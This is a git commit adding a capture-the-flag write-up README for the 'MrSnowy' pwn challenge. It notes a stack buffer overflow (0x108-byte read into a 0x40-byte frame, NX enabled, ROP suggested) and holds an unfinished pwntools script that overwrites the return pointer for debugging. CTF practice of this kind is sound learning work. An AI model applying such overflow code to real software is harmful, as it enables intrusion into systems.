add progress for mrsnowy

pwn/mrsnowy/README.md

@@ -0,0 +1,43 @@
+# MrSnowy
+
+There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
+But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
+Something must be wrong with him.
+
+## Flag
+
+## Progress so far
+
+- `read()` reads 0x108 bytes
+- The Stackframe has a size of 0x40 bytes
+- `checksec --file=mrsnowy` reports NX being enabled
+  - So no shellcode will be placable unless there is executable space
+  - This hints to ROP Chaining
+- The binary should be patched to get rid of the timetaking animation
+  - Just `nop` the banner() function call
+- Overwriting the returnpointer of `investigate()`:
+
+```python
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+p = process(e.path)
+
+def do_read():
+  while True:
+     ll = p.read()
+     print(ll)
+     if b'>' in ll:
+       break
+
+# if not patched wait for the animation and send 1
+do_read()
+p.sendline('1')
+do_read()
+
+# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+# start the python debugger to get a coredump which is loadable by gdb
+ipdb.set_trace()
+```